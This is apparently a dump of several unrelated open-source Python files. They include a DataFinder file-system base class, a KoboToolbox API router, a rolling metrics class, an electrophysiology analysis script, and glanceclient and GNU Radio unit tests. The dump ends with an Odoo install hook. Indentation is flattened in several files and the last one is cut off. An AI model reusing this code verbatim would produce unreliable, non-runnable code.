#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are
#met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the German Aerospace Center nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Base class for the adaptor specific file system factory implementations.
"""
import decimal
from datafinder.persistence.common import character_constants as char_const
from datafinder.persistence.data.datastorer import NullDataStorer
from datafinder.persistence.metadata.metadatastorer import NullMetadataStorer
from datafinder.persistence.principal_search.principalsearcher import NullPrincipalSearcher
from datafinder.persistence.privileges.privilegestorer import NullPrivilegeStorer
from datafinder.persistence.search.searcher import NullSearcher
__version__ = "$Revision-Id:$"
class BaseFileSystem(object):
""" Base class for the adaptor specific file system factory implementations. """
@property
def canHandleLocation(self):
"""
Indicates if the FileSystem can handle the location.
@return: True if FileSystem can handle the location, False if not.
"""
        self = self # silent pylint
return True
def createDataStorer(self, identifier):
"""
        Factory method for an adapter-specific data storer.
        @return: Adapter-specific data storer.
@rtype: instanceOf L{NullDataStorer<datafinder.persistence.data.datastorer.NullDataStorer>}
"""
self = self # silent pylint
return NullDataStorer(identifier)
def createMetadataStorer(self, identifier):
"""
        Factory method for an adapter-specific meta data storer.
        @return: Adapter-specific meta data storer.
@rtype: instanceOf L{NullMetadataStorer<datafinder.persistence.metadata.metadatastorer.NullMetadataStorer>}
"""
self = self # silent pylint
return NullMetadataStorer(identifier)
def createPrivilegeStorer(self, identifier):
"""
        Factory method for an adapter-specific privilege storer.
        @return: Adapter-specific privilege storer.
        @rtype: instanceOf L{NullPrivilegeStorer<datafinder.persistence.privileges.privilegestorer.NullPrivilegeStorer>}
"""
self = self # silent pylint
return NullPrivilegeStorer(identifier)
def createPrincipalSearcher(self):
"""
        Factory method for an adapter-specific principal searcher.
        @return: Adapter-specific principal searcher.
        @rtype: instanceOf L{NullPrincipalSearcher<datafinder.persistence.principal_search.principalsearcher.NullPrincipalSearcher>}
"""
self = self # silent pylint
return NullPrincipalSearcher()
def createSearcher(self):
"""
        Factory method for an adapter-specific searcher.
        @return: Adapter-specific searcher.
        @rtype: instanceOf L{NullSearcher<datafinder.persistence.search.searcher.NullSearcher>}
"""
self = self # silent pylint
return NullSearcher()
def release(self):
"""
@see: L{FileSystem.release<datafinder.persistence.factory.FileSystem.release>}
@note: The default implementation does nothing.
"""
pass
def updateCredentials(self, credentials):
"""
@see: L{FileSystem.updateCredentials<datafinder.persistence.factory.FileSystem.updateCredentials>}
@note: The default implementation does nothing.
"""
pass
def prepareUsage(self):
"""
Prepares usage of the file system.
@note: The default implementation does nothing.
"""
pass
def isValidIdentifier(self, name):
"""
@see: L{FileSystem.isValidIdentifier<datafinder.persistence.factory.FileSystem.metadataIdentifierPattern>}
        @note: Returns C{True}, C{None} for a valid name, otherwise C{False} and the position of the first offending character.
"""
return self._validateIdentifier(name,
char_const.IDENTIFIER_INVALID_CHARACTER_RE,
char_const.IDENTIFIER_VALID_STARTCHARACTER_RE)
@staticmethod
def _validateIdentifier(name, invalidCharRe, validStartCharRe):
""" Helper used for identifier validation. """
        isValidIdentifier = False, None
        if name is not None and len(name.strip()) > 0:
            result = invalidCharRe.search(name)
            if result is not None:
                isValidIdentifier = False, result.start()
            else:
                if validStartCharRe.match(name):
                    isValidIdentifier = True, None
                else:
                    isValidIdentifier = False, 0
        return isValidIdentifier
def isValidMetadataIdentifier(self, name): # W0613
"""
@see: L{FileSystem.metadataIdentifier<datafinder.persistence.factory.FileSystem.metadataIdentifierPattern>}
        @note: Returns C{True}, C{None} for a valid property name, otherwise C{False} and the position of the first offending character.
"""
return self._validateIdentifier(name,
char_const.PROPERTYNAME_INVALID_CHARACTER_RE,
char_const.PROPERTYNAME_VALID_STARTCHARACTER_RE)
@property
def hasCustomMetadataSupport(self):
"""
@see: L{FileSystem.hasCustomMetadataSupport<datafinder.persistence.factory.FileSystem.hasCustomMetadataSupport>}
@note: This implementation always returns C{False}.
"""
self = self # silent pylint
return False
@property
def hasMetadataSearchSupport(self):
"""
@see: L{FileSystem.hasMetadataSearchSupport<datafinder.persistence.factory.FileSystem.hasMetadataSearchSupport>}
@note: This implementation always returns C{False}.
"""
self = self # silent pylint
return False
@property
def hasPrivilegeSupport(self):
"""
@see: L{FileSystem.hasPrivilegeSupport<datafinder.persistence.factory.FileSystem.hasPrivilegeSupport>}
@note: This implementation always returns C{False}.
"""
self = self # silent pylint
return False
def determineFreeDiskSpace(self):
"""
@see: L{FileSystem.determineFreeDiskSpace<datafinder.persistence.factory.FileSystem.determineFreeDiskSpace>}
"""
return decimal.Decimal('infinity')
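# --- Hedged example (editor addition, not part of the original module) -----
# A concrete adaptor typically subclasses BaseFileSystem and overrides only
# the factory methods and capability flags it can actually support; anything
# not overridden falls back to the Null implementations above. The class name
# below is an illustrative assumption, not part of DataFinder.
class _ExampleFileSystem(BaseFileSystem):
    """ Minimal sketch of an adaptor-specific factory. """
    def createDataStorer(self, identifier):
        # A real adaptor would return its own data storer implementation here.
        return NullDataStorer(identifier)
    @property
    def hasCustomMetadataSupport(self):
        return True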
| DLR-SC/DataFinder | src/datafinder/persistence/common/base_factory.py | Python | bsd-3-clause | 8,251 |
# coding: utf-8
from rest_framework_extensions.routers import ExtendedDefaultRouter
from kobo.apps.hook.views.v2.hook import HookViewSet
from kobo.apps.hook.views.v2.hook_log import HookLogViewSet
from kobo.apps.hook.views.v2.hook_signal import HookSignalViewSet
from kpi.views.v2.asset import AssetViewSet
from kpi.views.v2.asset_export_settings import AssetExportSettingsViewSet
from kpi.views.v2.asset_file import AssetFileViewSet
from kpi.views.v2.asset_permission_assignment import AssetPermissionAssignmentViewSet
from kpi.views.v2.asset_snapshot import AssetSnapshotViewSet
from kpi.views.v2.asset_version import AssetVersionViewSet
from kpi.views.v2.data import DataViewSet
from kpi.views.v2.export_task import ExportTaskViewSet
from kpi.views.v2.import_task import ImportTaskViewSet
from kpi.views.v2.paired_data import PairedDataViewset
from kpi.views.v2.permission import PermissionViewSet
from kpi.views.v2.user import UserViewSet
from kpi.views.v2.user_asset_subscription import UserAssetSubscriptionViewSet
URL_NAMESPACE = 'api_v2'
router_api_v2 = ExtendedDefaultRouter()
asset_routes = router_api_v2.register(r'assets', AssetViewSet, basename='asset')
asset_routes.register(r'files',
AssetFileViewSet,
basename='asset-file',
parents_query_lookups=['asset'],
)
asset_routes.register(r'permission-assignments',
AssetPermissionAssignmentViewSet,
basename='asset-permission-assignment',
parents_query_lookups=['asset'],
)
asset_routes.register(r'versions',
AssetVersionViewSet,
basename='asset-version',
parents_query_lookups=['asset'],
)
asset_routes.register(r'data',
DataViewSet,
basename='submission',
parents_query_lookups=['asset'],
)
asset_routes.register(r'export-settings',
AssetExportSettingsViewSet,
basename='asset-export-settings',
parents_query_lookups=['asset'],
)
asset_routes.register(r'exports',
ExportTaskViewSet,
basename='asset-export',
parents_query_lookups=['asset'],
)
asset_routes.register(r'hook-signal',
HookSignalViewSet,
basename='hook-signal',
parents_query_lookups=['asset'],
)
asset_routes.register(r'paired-data',
PairedDataViewset,
basename='paired-data',
parents_query_lookups=['asset'],
)
hook_routes = asset_routes.register(r'hooks',
HookViewSet,
basename='hook',
parents_query_lookups=['asset'],
)
hook_routes.register(r'logs',
HookLogViewSet,
basename='hook-log',
parents_query_lookups=['asset', 'hook'],
)
router_api_v2.register(r'asset_snapshots', AssetSnapshotViewSet)
router_api_v2.register(
r'asset_subscriptions', UserAssetSubscriptionViewSet)
router_api_v2.register(r'users', UserViewSet)
router_api_v2.register(r'permissions', PermissionViewSet)
router_api_v2.register(r'imports', ImportTaskViewSet)
# TODO migrate ViewSet below
# router_api_v2.register(r'sitewide_messages', SitewideMessageViewSet)
#
# router_api_v2.register(r'authorized_application/users',
# AuthorizedApplicationUserViewSet,
# basename='authorized_applications')
# router_api_v2.register(r'authorized_application/one_time_authentication_keys',
# OneTimeAuthenticationKeyViewSet)
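# Hedged usage sketch (editor addition, illustrative only): the generated URLs
# are typically mounted in a project urls.py under the v2 namespace, roughly:
#
#     from django.urls import include, path
#     urlpatterns = [
#         path('api/v2/', include((router_api_v2.urls, URL_NAMESPACE))),
#     ]
#
# so that, for example, the nested data route resolves to
# /api/v2/assets/<parent_lookup_asset>/data/.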
| kobotoolbox/kpi | kpi/urls/router_api_v2.py | Python | agpl-3.0 | 4,029 |
from datetime import datetime, timedelta
def get_total_seconds(td):
if hasattr(timedelta, 'total_seconds'):
return td.total_seconds()
else:
return int(
(td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) / 10 ** 6)
class Spy:
def __init__(self):
self.eventList = []
def trimEventList(self, timestamp):
while len(self.eventList) > 0:
first_event = self.eventList[0]
time_delta = timestamp - first_event['timestamp']
if get_total_seconds(time_delta) > 60:
del self.eventList[0]
else:
return
def report(self, size):
now = datetime.now()
self.trimEventList(now)
if len(self.eventList) > 0:
last_batch = self.eventList[-1]
time_delta = now - last_batch['timestamp']
if get_total_seconds(time_delta) < 10:
last_batch['sum'] += size
last_batch['count'] += 1
return
self.eventList.append({'timestamp': now, 'sum': size, 'count': 1})
def get_metrics(self):
now = datetime.now()
count = 0
summary = 0
for batch in self.eventList:
            time_delta = now - batch['timestamp']
            if get_total_seconds(time_delta) > 60:
break
count += batch['count']
summary += batch['sum']
return {"sum": summary, "count": count}
TRIGGER_CHECK = Spy()
TRIGGER_CHECK_ERRORS = Spy()
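# Hedged usage sketch (editor addition, illustrative only):
#
#     TRIGGER_CHECK.report(0.042)   # record one event of "size" 0.042
#     TRIGGER_CHECK.get_metrics()   # -> {"sum": ..., "count": ...} for the last 60 s
#
# report() groups events into ~10-second batches and trimEventList() drops
# batches older than 60 seconds, so get_metrics() is a sliding-window total.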
| AlexAkulov/worker | moira/metrics/spy.py | Python | gpl-3.0 | 1,530 |
"""
let's just graph mean and mode with time.
also graph variance with time.
as mode moves around mean, it shows EPSC/IPSC balance.
Could the ratio be multiplied by the variance to return it to original magnitude?
"""
import os
import sys
sys.path.append("../../../../")
import swhlab
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import numpy as np
import time
class ABF2(swhlab.ABF):
def sweepYfilteredHisto(self):
chunkSize=100 #ms
        pad=int(self.pointsPerMs*chunkSize)
smooth=np.empty(len(self.sweepY))
smooth[:]=np.nan
for chunk in range(int(len(self.sweepY)/pad)):
I1,I2=int(chunk*pad),int((chunk+1)*pad)
smooth[I1:I2]=np.median(self.sweepY[I1:I2])
#smooth=swhlab.common.lowpass(smooth)
return self.sweepY-smooth
def phasicTonic(self,m1=None,m2=None,chunkMs=50,
quietPercentile=10,histResolution=1):
"""
chunkMs should be ~50 ms or greater.
bin sizes must be equal to or multiples of the data resolution.
transients smaller than the expected RMS will be silenced.
"""
# prepare sectioning values to be used later (marker positions)
m1=0 if m1 is None else m1*self.pointsPerSec
        m2=len(self.sweepY) if m2 is None else m2*self.pointsPerSec
m1,m2=int(m1),int(m2)
# prepare histogram values to be used later
padding=200 # pA or mV of maximum expected deviation
chunkPoints=int(chunkMs*self.pointsPerMs)
histBins=int((padding*2)/histResolution)
# center the data at 0 using peak histogram, not the mean
#Y=self.sweepY[m1:m2]
Y=self.sweepYfilteredHisto()[m1:m2]
hist,bins=np.histogram(Y,bins=2*padding)
#Yoffset=bins[np.where(hist==max(hist))[0][0]]
#Y=Y-Yoffset # we don't have to, but PDF math is easier
# create histogram for all data in the sweep
nChunks=int(len(Y)/chunkPoints)
hist,bins=np.histogram(Y,bins=histBins,range=(-padding,padding))
# create histogram for just the sweeps with the lowest variance
chunks=np.reshape(Y[:nChunks*chunkPoints],(nChunks,chunkPoints))
#variances=np.var(chunks,axis=1)
variances=np.ptp(chunks,axis=1)
percentiles=np.empty(len(variances))
for i,variance in enumerate(variances):
percentiles[i]=sorted(variances).index(variance)/len(variances)*100
blData=chunks[np.where(percentiles<=quietPercentile)[0]].flatten()
blHist,blBins=np.histogram(blData,bins=histBins,range=(-padding,padding))
blHist=blHist/max(blHist)*max(hist)
# determine the phasic current by subtracting-out the baseline
diff=hist-blHist
        return diff/self.pointsPerSec # charge/sec
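# Hedged note (editor addition): phasicTonic() returns the baseline-subtracted
# histogram in charge/sec per bin, ordered from the most negative to the most
# positive deviation. The __main__ block below therefore uses
# np.split(phasic, 2) to sum the downward (negative) and upward (positive)
# components separately for each sweep.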
if __name__=="__main__":
#abfPath=r"X:\Data\2P01\2016\2016-09-01 PIR TGOT"
abfPath=r"C:\Users\scott\Documents\important\demodata"
abf=ABF2(os.path.join(abfPath,"16d14036.abf"))
#abf=ABF2(os.path.join(abfPath,"16d16007.abf"))
t=time.perf_counter()
Xs=np.arange(abf.sweeps)*abf.sweepLength
pos,neg=np.zeros(len(Xs)),np.zeros(len(Xs))
for sweep in abf.setsweeps():
print("on sweep %d of %d"%(sweep,abf.sweeps))
phasic=abf.phasicTonic(.5)
neg[sweep],pos[sweep]=np.sum(np.split(phasic,2),1)
np.save("neg.npy",neg)
np.save("pos.npy",pos)
t=time.perf_counter()-t
plt.figure(figsize=(10,5))
plt.grid()
plt.title("analysis of %s completed in %.02f S"%(abf.ID,t))
plt.plot(Xs,pos,'.',color='b',alpha=.3)
plt.plot(Xs,swhlab.common.lowpass(pos),'-',color='b',alpha=.5,lw=5,label="upward")
plt.plot(Xs,neg,'.',color='r',alpha=.3)
plt.plot(Xs,swhlab.common.lowpass(neg),'-',color='r',alpha=.5,lw=5,label="downward")
for sweep in abf.comment_times:
plt.axvline(sweep,lw=5,alpha=.5,color='g',ls='--')
plt.axhline(0,color='k',lw=3,alpha=.5)
plt.xlabel("time (secods)")
plt.ylabel("ms * pA / sec")
plt.legend(loc='upper left',shadow=True)
plt.margins(0,.1)
plt.show()
print("DONE") | swharden/SWHLab | doc/uses/EPSCs-and-IPSCs/variance method/2016-12-18 01 curve fit.py | Python | mit | 4,194 |
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from glanceclient.tests import utils
from glanceclient.v2 import metadefs
NAMESPACE1 = 'Namespace1'
PROPERTY1 = 'Property1'
PROPERTY2 = 'Property2'
PROPERTYNEW = 'PropertyNew'
data_fixtures = {
"/v2/metadefs/namespaces/%s/properties" % NAMESPACE1: {
"GET": (
{},
{
"properties": {
PROPERTY1: {
"default": "1",
"type": "integer",
"description": "Number of cores.",
"title": "cores"
},
PROPERTY2: {
"items": {
"enum": [
"Intel",
"AMD"
],
"type": "string"
},
"type": "array",
"description": "Specifies the CPU manufacturer.",
"title": "Vendor"
},
}
}
),
"POST": (
{},
{
"items": {
"enum": [
"Intel",
"AMD"
],
"type": "string"
},
"type": "array",
"description": "UPDATED_DESCRIPTION",
"title": "Vendor",
"name": PROPERTYNEW
}
),
"DELETE": (
{},
{}
)
},
"/v2/metadefs/namespaces/%s/properties/%s" % (NAMESPACE1, PROPERTY1): {
"GET": (
{},
{
"items": {
"enum": [
"Intel",
"AMD"
],
"type": "string"
},
"type": "array",
"description": "Specifies the CPU manufacturer.",
"title": "Vendor"
}
),
"PUT": (
{},
{
"items": {
"enum": [
"Intel",
"AMD"
],
"type": "string"
},
"type": "array",
"description": "UPDATED_DESCRIPTION",
"title": "Vendor"
}
),
"DELETE": (
{},
{}
)
}
}
schema_fixtures = {
"metadefs/property": {
"GET": (
{},
{
"additionalProperties": False,
"definitions": {
"positiveIntegerDefault0": {
"allOf": [
{
"$ref": "#/definitions/positiveInteger"
},
{
"default": 0
}
]
},
"stringArray": {
"minItems": 1,
"items": {
"type": "string"
},
"uniqueItems": True,
"type": "array"
},
"positiveInteger": {
"minimum": 0,
"type": "integer"
}
},
"required": [
"name",
"title",
"type"
],
"name": "property",
"properties": {
"description": {
"type": "string"
},
"minLength": {
"$ref": "#/definitions/positiveIntegerDefault0"
},
"enum": {
"type": "array"
},
"minimum": {
"type": "number"
},
"maxItems": {
"$ref": "#/definitions/positiveInteger"
},
"maxLength": {
"$ref": "#/definitions/positiveInteger"
},
"uniqueItems": {
"default": False,
"type": "boolean"
},
"additionalItems": {
"type": "boolean"
},
"name": {
"type": "string"
},
"title": {
"type": "string"
},
"default": {},
"pattern": {
"type": "string",
"format": "regex"
},
"required": {
"$ref": "#/definitions/stringArray"
},
"maximum": {
"type": "number"
},
"minItems": {
"$ref": "#/definitions/positiveIntegerDefault0"
},
"readonly": {
"type": "boolean"
},
"items": {
"type": "object",
"properties": {
"enum": {
"type": "array"
},
"type": {
"enum": [
"array",
"boolean",
"integer",
"number",
"object",
"string",
"null"
],
"type": "string"
}
}
},
"type": {
"enum": [
"array",
"boolean",
"integer",
"number",
"object",
"string",
"null"
],
"type": "string"
}
}
}
)
}
}
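# Hedged note (editor addition): both fixture dicts above map a request path
# to a dict of HTTP methods, each holding a two-tuple (headers, body) that the
# FakeAPI / FakeSchemaAPI test doubles return, so the controller under test
# never talks to a real Glance server.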
class TestPropertyController(testtools.TestCase):
def setUp(self):
super(TestPropertyController, self).setUp()
self.api = utils.FakeAPI(data_fixtures)
self.schema_api = utils.FakeSchemaAPI(schema_fixtures)
self.controller = metadefs.PropertyController(self.api,
self.schema_api)
def test_list_property(self):
properties = list(self.controller.list(NAMESPACE1))
actual = [prop.name for prop in properties]
self.assertEqual(sorted([PROPERTY1, PROPERTY2]), sorted(actual))
def test_get_property(self):
prop = self.controller.get(NAMESPACE1, PROPERTY1)
self.assertEqual(PROPERTY1, prop.name)
def test_create_property(self):
properties = {
'name': PROPERTYNEW,
'title': 'TITLE',
'type': 'string'
}
obj = self.controller.create(NAMESPACE1, **properties)
self.assertEqual(PROPERTYNEW, obj.name)
def test_create_property_invalid_property(self):
properties = {
'namespace': NAMESPACE1
}
self.assertRaises(TypeError, self.controller.create, **properties)
def test_update_property(self):
properties = {
'description': 'UPDATED_DESCRIPTION'
}
prop = self.controller.update(NAMESPACE1, PROPERTY1, **properties)
self.assertEqual(PROPERTY1, prop.name)
def test_update_property_invalid_property(self):
properties = {
'type': 'INVALID'
}
self.assertRaises(TypeError, self.controller.update, NAMESPACE1,
PROPERTY1, **properties)
def test_update_property_disallowed_fields(self):
properties = {
'description': 'UPDATED_DESCRIPTION'
}
self.controller.update(NAMESPACE1, PROPERTY1, **properties)
actual = self.api.calls
_disallowed_fields = ['created_at', 'updated_at']
for key in actual[1][3]:
self.assertNotIn(key, _disallowed_fields)
def test_delete_property(self):
self.controller.delete(NAMESPACE1, PROPERTY1)
expect = [
('DELETE',
'/v2/metadefs/namespaces/%s/properties/%s' % (NAMESPACE1,
PROPERTY1),
{},
None)]
self.assertEqual(expect, self.api.calls)
def test_delete_all_properties(self):
self.controller.delete_all(NAMESPACE1)
expect = [
('DELETE',
'/v2/metadefs/namespaces/%s/properties' % NAMESPACE1,
{},
None)]
self.assertEqual(expect, self.api.calls)
| sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/glanceclient/tests/unit/v2/test_metadefs_properties.py | Python | mit | 10,072 |
#!/usr/bin/env python
#
# Copyright 2004,2007,2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from gnuradio import gr, gr_unittest, blocks
class test_add_mult_div_sub(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def help_ii(self, src_data, exp_data, op):
for s in zip(list(range(len(src_data))), src_data):
src = blocks.vector_source_i(s[1])
self.tb.connect(src, (op, s[0]))
dst = blocks.vector_sink_i()
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(exp_data, result_data)
def help_ss(self, src_data, exp_data, op):
for s in zip(list(range(len(src_data))), src_data):
src = blocks.vector_source_s(s[1])
self.tb.connect(src, (op, s[0]))
dst = blocks.vector_sink_s()
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(exp_data, result_data)
def help_ff(self, src_data, exp_data, op):
for s in zip(list(range(len(src_data))), src_data):
src = blocks.vector_source_f(s[1])
self.tb.connect(src, (op, s[0]))
dst = blocks.vector_sink_f()
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(exp_data, result_data)
def help_cc(self, src_data, exp_data, op):
for s in zip(list(range(len(src_data))), src_data):
src = blocks.vector_source_c(s[1])
self.tb.connect(src, (op, s[0]))
dst = blocks.vector_sink_c()
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(exp_data, result_data)
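    # Hedged note (editor addition): each help_* wrapper above connects one
    # vector source per input stream to port s[0] of the block under test,
    # runs the flowgraph, and compares the vector sink output with the
    # expected data for that item type (ss/ii/ff/cc).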
# add_XX
def test_add_ss(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [9, -1, 7, 12, 7]
op = blocks.add_ss()
self.help_ss((src1_data, src2_data), expected_result, op)
def test_add_ii(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [9, -1, 7, 12, 7]
op = blocks.add_ii()
self.help_ii((src1_data, src2_data), expected_result, op)
def test_add_ff(self):
src1_data = [1.0, 2.0, 3.0, 4.0, 5.0]
src2_data = [8.0, -3.0, 4.0, 8.0, 2.0]
expected_result = [9.0, -1.0, 7.0, 12.0, 7.0]
op = blocks.add_ff()
self.help_ff((src1_data, src2_data), expected_result, op)
def test_add_cc(self):
src1_data = [1+1j, 2+2j, 3+3j, 4+4j, 5+5j]
src2_data = [8+8j, -3-3j, 4+4j, 8+8j, 2+2j]
expected_result = [9+9j, -1-1j, 7+7j, 12+12j, 7+7j]
op = blocks.add_cc()
self.help_cc((src1_data, src2_data), expected_result, op)
# add_const_XX
def test_add_const_ss(self):
src_data = [1, 2, 3, 4, 5]
expected_result = [6, 7, 8, 9, 10]
op = blocks.add_const_ss(5)
self.help_ss((src_data,), expected_result, op)
def test_add_const_ii(self):
src_data = [1, 2, 3, 4, 5]
expected_result = [6, 7, 8, 9, 10]
op = blocks.add_const_ii(5)
self.help_ii((src_data,), expected_result, op)
def test_add_const_ff(self):
src_data = [1, 2, 3, 4, 5]
expected_result = [6, 7, 8, 9, 10]
op = blocks.add_const_ff(5)
self.help_ff((src_data,), expected_result, op)
def test_add_const_cc(self):
src_data = [1, 2, 3, 4, 5]
expected_result = [1+5j, 2+5j, 3+5j, 4+5j, 5+5j]
op = blocks.add_const_cc(5j)
self.help_cc((src_data,), expected_result, op)
# multiply_XX
def test_multiply_ss(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [8, -6, 12, 32, 10]
op = blocks.multiply_ss()
self.help_ss((src1_data, src2_data),
expected_result, op)
def test_multiply_ii(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [8, -6, 12, 32, 10]
op = blocks.multiply_ii()
self.help_ii((src1_data, src2_data),
expected_result, op)
def test_multiply_ff(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [8, -6, 12, 32, 10]
op = blocks.multiply_ff()
self.help_ff((src1_data, src2_data),
expected_result, op)
def test_multiply_cc(self):
src1_data = [1+1j, 2+2j, 3+3j, 4+4j, 5+5j]
src2_data = [8, -3, 4, 8, 2]
expected_result = [8+8j, -6-6j, 12+12j, 32+32j, 10+10j]
op = blocks.multiply_cc()
self.help_cc((src1_data, src2_data),
expected_result, op)
# multiply_const_XX
def test_multiply_const_ss(self):
src_data = [-1, 0, 1, 2, 3]
expected_result = [-5, 0, 5, 10, 15]
op = blocks.multiply_const_ss(5)
self.help_ss((src_data,), expected_result, op)
def test_multiply_const_ii(self):
src_data = [-1, 0, 1, 2, 3]
expected_result = [-5, 0, 5, 10, 15]
op = blocks.multiply_const_ii(5)
self.help_ii((src_data,), expected_result, op)
def test_multiply_const_ff(self):
src_data = [-1, 0, 1, 2, 3]
expected_result = [-5, 0, 5, 10, 15]
op = blocks.multiply_const_ff(5)
self.help_ff((src_data,), expected_result, op)
def test_multiply_const_cc(self):
src_data = [-1-1j, 0+0j, 1+1j, 2+2j, 3+3j]
expected_result = [-5-5j, 0+0j, 5+5j, 10+10j, 15+15j]
op = blocks.multiply_const_cc(5)
self.help_cc((src_data,), expected_result, op)
def test_multiply_const_cc2(self):
src_data = [-1-1j, 0+0j, 1+1j, 2+2j, 3+3j]
expected_result = [-3-7j, 0+0j, 3+7j, 6+14j, 9+21j]
op = blocks.multiply_const_cc(5+2j)
self.help_cc((src_data,), expected_result, op)
def test_sub_ii(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [-7, 5, -1, -4, 3]
op = blocks.sub_ii()
self.help_ii((src1_data, src2_data),
expected_result, op)
def test_sub_ii1(self):
src1_data = [1, 2, 3, 4, 5]
expected_result = [1, 2, 3, 4, 5]
src = blocks.vector_source_i(src1_data)
op = blocks.sub_ii()
dst = blocks.vector_sink_i()
self.tb.connect(src, op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_sub_ss(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [-7, 5, -1, -4, 3]
op = blocks.sub_ss()
self.help_ss((src1_data, src2_data),
expected_result, op)
def test_sub_ss1(self):
src1_data = [1, 2, 3, 4, 5]
expected_result = [1, 2, 3, 4, 5]
src = blocks.vector_source_s(src1_data)
op = blocks.sub_ss()
dst = blocks.vector_sink_s()
self.tb.connect(src, op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_sub_ff(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [-7, 5, -1, -4, 3]
op = blocks.sub_ff()
self.help_ff((src1_data, src2_data),
expected_result, op)
def test_sub_ff1(self):
src1_data = [1, 2, 3, 4, 5]
expected_result = [1, 2, 3, 4, 5]
src = blocks.vector_source_f(src1_data)
op = blocks.sub_ff()
dst = blocks.vector_sink_f()
self.tb.connect(src, op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_sub_cc(self):
src1_data = [1, 2, 3, 4, 5]
src2_data = [8, -3, 4, 8, 2]
expected_result = [-7, 5, -1, -4, 3]
op = blocks.sub_cc()
self.help_cc((src1_data, src2_data),
expected_result, op)
def test_sub_cc1(self):
src1_data = [1, 2, 3, 4, 5]
expected_result = [1, 2, 3, 4, 5]
src = blocks.vector_source_c(src1_data)
op = blocks.sub_cc()
dst = blocks.vector_sink_c()
self.tb.connect(src, op, dst)
self.tb.run()
result_data = dst.data()
self.assertEqual(expected_result, result_data)
def test_div_ff(self):
src1_data = [ 5, 9, -15, 1024]
src2_data = [10, 3, -5, 64]
expected_result = [0.5, 3, 3, 16]
op = blocks.divide_ff()
self.help_ff((src1_data, src2_data), expected_result, op)
if __name__ == '__main__':
gr_unittest.run(test_add_mult_div_sub, "test_add_mult_div_sub.xml")
| jdemel/gnuradio | gr-blocks/python/blocks/qa_add_mult_div_sub.py | Python | gpl-3.0 | 8,995 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# account_analytic_project_id
# Copyright (c) 2015 Acsone SA/NV (http://www.acsone.eu)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
def set_account_analytic_account_project_id(cr, pool):
'''
Initialize the project_id field in case the module is
installed when projects already exist
'''
cr.execute("""
update account_analytic_account
set project_id = (select id
from project_project where
analytic_account_id = account_analytic_account.id)
""")
return
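# Hedged usage note (editor addition): a function with this (cr, pool)
# signature is normally wired up as the module's post-install hook, e.g. via
# something along the lines of
#
#     'post_init_hook': 'set_account_analytic_account_project_id',
#
# in the module manifest; the exact key and wiring depend on the OpenERP/Odoo
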